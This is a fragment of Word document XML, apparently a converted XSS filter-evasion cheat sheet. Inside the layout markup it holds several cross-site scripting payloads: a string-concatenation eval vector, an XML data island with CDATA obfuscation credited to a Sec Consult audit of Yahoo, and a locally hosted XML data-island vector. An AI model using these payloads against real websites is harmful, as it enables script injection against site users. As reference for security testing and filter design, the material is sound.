                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8700"/>
                              <a:gd name="T10" fmla="+- 0 1395 205"/>
                              <a:gd name="T11" fmla="*/ 1395 h 1191"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8700"/>
                              <a:gd name="T14" fmla="+- 0 1375 205"/>
                              <a:gd name="T15" fmla="*/ 1375 h 1191"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8700"/>
                              <a:gd name="T18" fmla="+- 0 1372 205"/>
                              <a:gd name="T19" fmla="*/ 1372 h 1191"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8700"/>
                              <a:gd name="T22" fmla="+- 0 226 205"/>
                              <a:gd name="T23" fmla="*/ 226 h 1191"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8700"/>
                              <a:gd name="T26" fmla="+- 0 205 205"/>
                              <a:gd name="T27" fmla="*/ 205 h 1191"/>
                              <a:gd name="T28" fmla="+- 0 10293 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8700"/>
                              <a:gd name="T30" fmla="+- 0 205 205"/>
                              <a:gd name="T31" fmla="*/ 205 h 1191"/>
                              <a:gd name="T32" fmla="+- 0 10314 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8700"/>
                              <a:gd name="T34" fmla="+- 0 226 205"/>
                              <a:gd name="T35" fmla="*/ 226 h 1191"/>
                              <a:gd name="T36" fmla="+- 0 10314 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8700"/>
                              <a:gd name="T38" fmla="+- 0 1375 205"/>
                              <a:gd name="T39" fmla="*/ 1375 h 1191"/>
                              <a:gd name="T40" fmla="+- 0 10296 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8700"/>
                              <a:gd name="T42" fmla="+- 0 1395 205"/>
                              <a:gd name="T43" fmla="*/ 1395 h 1191"/>
                              <a:gd name="T44" fmla="+- 0 10293 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8700"/>
                              <a:gd name="T46" fmla="+- 0 1396 205"/>
                              <a:gd name="T47" fmla="*/ 1396 h 1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1191">
                                <a:moveTo>
                                  <a:pt x="8679" y="1191"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="1191"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="1190"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1170"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="116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1170"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8682" y="1190"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8679" y="1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Text Box 670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05"/>
                            <a:ext cx="8700" cy="1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spacing w:line="312" w:lineRule="auto"/>
                                <w:ind w:left="165" w:right="6937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a="get";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b="URL(\"";</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:line="312" w:lineRule="auto"/>
                                <w:ind w:left="165" w:right="5581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c="javascript:";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d="alert('XSS');\")";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7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eval(a+b+c+d);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9" o:spid="_x0000_s1761" style="position:absolute;margin-left:80.7pt;margin-top:10.25pt;width:435pt;height:59.55pt;z-index:-15600128;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,205" coordsize="8700,1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">
                <v:shape id="Freeform 671" o:spid="_x0000_s1762" style="position:absolute;left:1614;top:205;width:8700;height:1191;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8700,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5qmMQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPwWrDMBBE74H+g9hCb7Hc1pjEjRJCIcaXHOrkA9bW&#10;Vja1VsZSY/fvq0Kgx2Fm3jC7w2IHcaPJ944VPCcpCOLW6Z6NguvltN6A8AFZ4+CYFPyQh8P+YbXD&#10;QruZP+hWByMihH2BCroQxkJK33Zk0SduJI7ep5sshignI/WEc4TbQb6kaS4t9hwXOhzpvaP2q/62&#10;Cpplm5WvG1Odj5lxpmnycj6hUk+Py/ENRKAl/Ifv7UoryPMt/J2JR0D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eapjEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m8679,1191r-8658,l18,1190,,1170r,-3l,21,21,,8679,r21,21l8700,1170r-18,20l8679,1191xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8679,1396;21,1396;18,1395;0,1375;0,1372;0,226;21,205;8679,205;8700,226;8700,1375;8682,1395;8679,1396" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 670" o:spid="_x0000_s1763" type="#_x0000_t202" style="position:absolute;left:1614;top:205;width:8700;height:1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Lv98IA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+C/4P4Q1203QeutmZioiCMBir9eDxrXlt&#10;g81LbaJ2//1yGOz48f1erUfbiTsN3jhW8DJPQBBXThtuFJzK/ewNhA/IGjvHpOCHPKzz6WSFmXYP&#10;Luh+DI2IIewzVNCG0GdS+qoli37ueuLI1W6wGCIcGqkHfMRw28lFkqTSouHY0GJP25aqy/FmFWzO&#10;XOzM9fP7q6gLU5bLhD/Si1LPT+PmHUSgMfyL/9wHrSB9jfPjmX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cu/3wgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA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spacing w:line="312" w:lineRule="auto"/>
                          <w:ind w:left="165" w:right="6937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a="get";</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E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b="URL(\"";</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:line="312" w:lineRule="auto"/>
                          <w:ind w:left="165" w:right="5581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c="javascript:";</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E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d="alert('XSS');\")";</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-7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eval(a+b+c+d);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3"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="154"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>XML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z w:val="20"/>
        </w:rPr>
        <w:t>Island</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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CDATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Obfuscation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19" w:lineRule="auto"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>works</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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IE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Netscape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>8.1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IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rendering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mode)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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Sec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Consult</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>auditing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Yahoo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="9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1686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96520</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5524500" cy="386080"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="665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386080"/>
                          <a:chOff x="1614" y="152"/>
                          <a:chExt cx="8700" cy="608"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="666" name="Freeform 668"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="151"/>
                            <a:ext cx="8700" cy="608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759 152"/>
                              <a:gd name="T3" fmla="*/ 759 h 608"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8700"/>
                              <a:gd name="T6" fmla="+- 0 759 152"/>
                              <a:gd name="T7" fmla="*/ 759 h 608"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8700"/>
                              <a:gd name="T10" fmla="+- 0 759 152"/>
                              <a:gd name="T11" fmla="*/ 759 h 608"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8700"/>
                              <a:gd name="T14" fmla="+- 0 738 152"/>
                              <a:gd name="T15" fmla="*/ 738 h 608"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8700"/>
                              <a:gd name="T18" fmla="+- 0 735 152"/>
                              <a:gd name="T19" fmla="*/ 735 h 608"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8700"/>
                              <a:gd name="T22" fmla="+- 0 173 152"/>
                              <a:gd name="T23" fmla="*/ 173 h 608"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8700"/>
                              <a:gd name="T26" fmla="+- 0 152 152"/>
                              <a:gd name="T27" fmla="*/ 152 h 608"/>
                              <a:gd name="T28" fmla="+- 0 10293 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8700"/>
                              <a:gd name="T30" fmla="+- 0 152 152"/>
                              <a:gd name="T31" fmla="*/ 152 h 608"/>
                              <a:gd name="T32" fmla="+- 0 10314 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8700"/>
                              <a:gd name="T34" fmla="+- 0 173 152"/>
                              <a:gd name="T35" fmla="*/ 173 h 608"/>
                              <a:gd name="T36" fmla="+- 0 10314 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8700"/>
                              <a:gd name="T38" fmla="+- 0 738 152"/>
                              <a:gd name="T39" fmla="*/ 738 h 608"/>
                              <a:gd name="T40" fmla="+- 0 10296 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8700"/>
                              <a:gd name="T42" fmla="+- 0 759 152"/>
                              <a:gd name="T43" fmla="*/ 759 h 608"/>
                              <a:gd name="T44" fmla="+- 0 10293 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8700"/>
                              <a:gd name="T46" fmla="+- 0 759 152"/>
                              <a:gd name="T47" fmla="*/ 759 h 6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608">
                                <a:moveTo>
                                  <a:pt x="8679" y="607"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="586"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="58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586"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8682" y="607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8679" y="6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Text Box 66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51"/>
                            <a:ext cx="8700" cy="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tabs>
                                  <w:tab w:val="left" w:leader="hyphen" w:pos="3705"/>
                                </w:tabs>
                                <w:spacing w:before="136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&lt;XML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ID="xss"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG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7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SRC="javas&lt;!</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman"/>
                                  <w:color w:val="36454E"/>
                                  <w:w w:val="90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&gt;cript:alert('XSS')"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="45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&lt;SPAN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DATASRC="#xss"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DATAFLD="B"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DATAFORMATAS="HTML"&gt;&lt;/SPAN&gt;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6" o:spid="_x0000_s1764" style="position:absolute;margin-left:80.7pt;margin-top:7.6pt;width:435pt;height:30.4pt;z-index:-15599616;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,152" coordsize="8700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">
                <v:shape id="Freeform 668" o:spid="_x0000_s1765" style="position:absolute;left:1614;top:151;width:8700;height:608;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8700,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oFusQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE74X+h/CEXopm20OU1ShSEKRQ0G0v3h6b&#10;52bZzUvYpLr9940geBxm5htmtRldLy40xNazhrdZAYK49qblRsPP9266ABETssHeM2n4owib9fPT&#10;Ckvjr3ykS5UakSEcS9RgUwqllLG25DDOfCDO3tkPDlOWQyPNgNcMd718LwolHbacFywG+rBUd9Wv&#10;0zB+2d3+9fR5PnYq+GruDx2Hg9Yvk3G7BJFoTI/wvb03GpRScDuTj4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aBbrEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m8679,607l21,607r-3,l,586r,-3l,21,21,,8679,r21,21l8700,586r-18,21l8679,607xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8679,759;21,759;18,759;0,738;0,735;0,173;21,152;8679,152;8700,173;8700,738;8682,759;8679,759" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 667" o:spid="_x0000_s1766" type="#_x0000_t202" style="position:absolute;left:1614;top:151;width:8700;height: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LhXsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UJvdWNPcQa3YgUC4VCMaaHHp/Z&#10;l2Qx+zZmt5r+e1coeBxm5htmtR5tJ840eONYwWyagCCunDbcKPgu359fQfiArLFzTAr+yMM6f3xY&#10;YabdhQs670MjIoR9hgraEPpMSl+1ZNFPXU8cvdoNFkOUQyP1gJcIt518SZJUWjQcF1rs6a2l6rj/&#10;tQo2P1xszenrsCvqwpTlIuHP9KjU02TcLEEEGsM9/N/+0ArSdA63M/EI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uFe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tabs>
                            <w:tab w:val="left" w:leader="hyphen" w:pos="3705"/>
                          </w:tabs>
                          <w:spacing w:before="136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&lt;XML</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="3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ID="xss"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="37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SRC="javas&lt;!</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman"/>
                            <w:color w:val="36454E"/>
                            <w:w w:val="90"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:tab/>
                        </w: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&gt;cript:alert('XSS')"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="45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&lt;SPAN</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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DATASRC="#xss"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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DATAFLD="B"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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DATAFORMATAS="HTML"&gt;&lt;/SPAN&gt;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rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="111"/>
      </w:pPr>
      <w:r>
        <w:t>Locally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>hosted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XML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embedded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript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XML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island</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="418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1737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420370</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5524500" cy="386080"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="662" name="Group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386080"/>
                          <a:chOff x="1614" y="662"/>
                          <a:chExt cx="8700" cy="608"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="663" name="Freeform 665"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="662"/>
                            <a:ext cx="8700" cy="608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1270 662"/>
                              <a:gd name="T3" fmla="*/ 1270 h 608"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8700"/>
                              <a:gd name="T6" fmla="+- 0 1270 662"/>
                              <a:gd name="T7" fmla="*/ 1270 h 608"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8700"/>
                              <a:gd name="T10" fmla="+- 0 1269 662"/>
                              <a:gd name="T11" fmla="*/ 1269 h 608"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8700"/>
                              <a:gd name="T14" fmla="+- 0 1249 662"/>
                              <a:gd name="T15" fmla="*/ 1249 h 608"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8700"/>
                              <a:gd name="T18" fmla="+- 0 1246 662"/>
                              <a:gd name="T19" fmla="*/ 1246 h 608"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8700"/>
                              <a:gd name="T22" fmla="+- 0 683 662"/>
                              <a:gd name="T23" fmla="*/ 683 h 608"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8700"/>
                              <a:gd name="T26" fmla="+- 0 662 662"/>
                              <a:gd name="T27" fmla="*/ 662 h 608"/>
                              <a:gd name="T28" fmla="+- 0 10293 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8700"/>
                              <a:gd name="T30" fmla="+- 0 662 662"/>
                              <a:gd name="T31" fmla="*/ 662 h 608"/>
                              <a:gd name="T32" fmla="+- 0 10314 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8700"/>
                              <a:gd name="T34" fmla="+- 0 683 662"/>
                              <a:gd name="T35" fmla="*/ 683 h 608"/>
                              <a:gd name="T36" fmla="+- 0 10314 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8700"/>
                              <a:gd name="T38" fmla="+- 0 1249 662"/>
                              <a:gd name="T39" fmla="*/ 1249 h 608"/>
                              <a:gd name="T40" fmla="+- 0 10296 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8700"/>
                              <a:gd name="T42" fmla="+- 0 1269 662"/>
                              <a:gd name="T43" fmla="*/ 1269 h 608"/>
                              <a:gd name="T44" fmla="+- 0 10293 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8700"/>
                              <a:gd name="T46" fmla="+- 0 1270 662"/>
                              <a:gd name="T47" fmla="*/ 1270 h 6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608">
                                <a:moveTo>
                                  <a:pt x="8679" y="608"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="608"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="587"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="584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587"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8682" y="607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8679" y="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Text Box 664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662"/>
                            <a:ext cx="8700" cy="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&lt;XML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SRC="xsstest.xml"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ID=I&gt;&lt;/XML&gt;</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="45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&lt;SPAN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DATASRC=#I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DATAFLD=C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DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;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3" o:spid="_x0000_s1767" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:33.1pt;width:435pt;height:30.4pt;z-index:-15599104;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,662" coordsize="8700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">
                <v:shape id="Freeform 665" o:spid="_x0000_s1768" style="position:absolute;left:1614;top:662;width:8700;height:608;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8700,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2mIsQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE74X+h/AKXkrNqrDK1igiCFIo6OrF22Pz&#10;3Cy7eQmbqNt/3wiFHoeZ+YZZrgfbiTv1oXGsYDLOQBBXTjdcKzifdh8LECEia+wck4IfCrBevb4s&#10;sdDuwUe6l7EWCcKhQAUmRl9IGSpDFsPYeeLkXV1vMSbZ11L3+Ehw28lpluXSYsNpwaCnraGqLW9W&#10;wfBtdvv3y9f12ObelXN3aNkflBq9DZtPEJGG+B/+a++1gjyfwfNMOg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tpiLEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m8679,608l21,608r-3,-1l,587r,-3l,21,21,,8679,r21,21l8700,587r-18,20l8679,608xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8679,1270;21,1270;18,1269;0,1249;0,1246;0,683;21,662;8679,662;8700,683;8700,1249;8682,1269;8679,1270" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 664" o:spid="_x0000_s1769" type="#_x0000_t202" style="position:absolute;left:1614;top:662;width:8700;height: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B/KcQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IK3nRTkaCpq0hRKAjSmB56fM0+&#10;k8Xs25jdavz3bkHwOMzMN8xi1dtGXKjzxrGCt3ECgrh02nCl4LvYjmYgfEDW2DgmBTfysFq+DBaY&#10;aXflnC6HUIkIYZ+hgjqENpPSlzVZ9GPXEkfv6DqLIcqukrrDa4TbRk6SJJUWDceFGlv6qKk8Hf6s&#10;gvUP5xtz3v9+5cfcFMU84V16Umr42q/fQQTqwzP8aH9qBWk6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QfynEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=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&lt;XML</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="3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SRC="xsstest.xml"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="3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ID=I&gt;&lt;/XML&gt;</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="45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&lt;SPAN</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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DATASRC=#I</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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DATAFLD=C</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;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This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above</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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instead</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>refers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locally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>hosted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(must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same</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>server)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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contains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
